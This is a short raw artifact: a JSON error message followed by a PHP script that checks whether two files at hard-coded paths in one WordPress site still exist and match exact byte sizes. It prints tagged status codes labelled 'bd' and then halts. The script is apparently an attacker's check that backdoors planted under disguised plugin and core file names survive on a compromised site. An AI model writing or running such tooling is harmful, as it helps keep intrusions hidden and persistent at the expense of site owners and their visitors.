{ "error_code": "500", "data": { "zhuang_tai": "token_no", "times": "1764538817" } }
<?php $r = '/home/decide.family/public_html'; $x = ["/wp-content/plugins/autodescription/inc/classes/data/plugin/index.class.php"=>"bd@@209578501@@1107",
"/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php"=>"bd@@211649026@@4866"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');